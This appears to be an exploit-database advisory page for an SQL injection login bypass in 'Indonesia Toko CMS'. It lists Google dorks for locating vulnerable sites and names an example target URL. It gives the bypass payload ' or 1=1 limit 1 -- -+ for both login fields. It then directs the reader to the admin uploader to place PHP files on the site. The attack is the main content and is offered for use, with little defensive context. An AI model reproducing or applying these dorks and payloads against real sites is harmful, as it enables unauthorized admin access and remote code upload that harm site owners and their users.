Indonesia Toko CMS Bypass SQL Admin Login

2019.03.02

Negat1ve1337 (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:"index.php?mnu=login"

[+]Exploit Title: Indonesia Toko CMS Bypass SQL Admin Login
[+]Author: Negat1ve
[+]Team: -1
[+]Goolge Dork:
inurl:"index.php?mnu=login"
inurl:"/ypathfile/"
[+]Tested on: Windows 10 x64
=======================================
[+]Proof Of Concept:
Dorking with the dork and get some vuln site
Example:
http://e-jakarta.com/index.php?mnu=login
Exploit the login details with credential like this
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
Then you will get "Alert" , Admin successfully login
Go to /index.php?mnu=admin or just click Admin
No need to write user,email,password. Go to the uploader and upload a php files
Your file will go to site/ypathfile/
Greetz: Electronic Thunderbolt Team - Giant-ps - Anonymous arabe - special for Posit1ve ( my gf )

References:

Myself and Google

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Indonesia Toko CMS Bypass SQL Admin Login

Dork: inurl:"index.php?mnu=login"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.